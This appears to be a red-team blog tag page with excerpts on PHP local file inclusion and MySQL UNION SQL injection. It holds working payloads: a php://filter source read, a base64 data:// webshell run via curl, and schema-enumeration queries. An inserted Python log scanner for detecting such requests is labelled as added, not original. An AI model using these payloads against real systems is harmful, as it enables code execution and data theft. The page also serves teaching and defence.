Posts tagged: #Red-Team

Imagine a PHP file vulnerable to local file inclusion (LFI), such as:

curl http://example.com/vuln.php?lang=en.php

With a badly configured server and app, you can use PHP read filters to get the full content of the file:

curl http://example.com/vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php

You can get a webshell or RCE if allow_url_include is enabled:

curl 'http://example.com/vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&cmd=whoami'

The shell is <?php system($_GET['cmd']);

[Read more]
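Seen from the defender's side, the requests above stand out in access logs because the parameter value begins with a PHP stream wrapper. The following Python sketch is an added example, not part of the original post; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# PHP stream wrappers that should never appear in a parameter expecting a file name.
WRAPPER_RE = re.compile(r"\s*(php|data|phar|zip|expect|glob|file|ftp|https?):", re.I)
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %2570hp -> %70hp -> php)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_wrapper_params(log_line):
    """Return [(param, wrapper)] for query values that begin with a stream wrapper."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    hits = []
    # parse_qsl already percent-decodes once; fully_decode handles extra layers.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        w = WRAPPER_RE.match(fully_decode(value))
        if w:
            hits.append((name, w.group(1).lower()))
    return hits

def scan(lines):
    """Return {line_number: hits} for every log line with at least one hit."""
    return {n: h for n, line in enumerate(lines, 1) if (h := find_wrapper_params(line))}

# Constructed sample lines (combined-log style); the payload "AAAA" is a placeholder.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /vuln.php?lang=en.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /vuln.php?lang=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CAAAA&page=2 HTTP/1.1" 200 64',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /vuln.php?lang=%2570hp%3A%2F%2Ffilter/resource=en.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(n, hits)
```

Parameters that legitimately carry URLs (redirect targets, for example) will also match, so in practice restrict the check to parameters that are expected to hold file names.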

Using a UNION injection, we can find out about the structure of a (MySQL/MariaDB) database.

Here are some minimal examples. Remember to determine the correct number of columns and match it. Also remember to add WHERE clauses to these to narrow down the search.

Databases

UNION SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

Tables

UNION SELECT TABLE_NAME,TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES;

Columns

UNION SELECT COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS;

Privileges

UNION SELECT GRANTEE, PRIVILEGE_TYPE FROM INFORMATION_SCHEMA.USER_PRIVILEGES;

References

[Read more]

A union injection causes additional rows to be added to the result set by using the UNION clause. To do this, we need to know the number of columns in the target result set.

There are two easy strategies for this: using ORDER BY or UNION. Assume that the following is vulnerable:

SELECT * from users where username='$oops'

order by

In MySQL, ORDER BY accepts numeric arguments, which you can use to infer the number of columns. Let $oops = "test' order by 1 -- "; then the query becomes:

[Read more]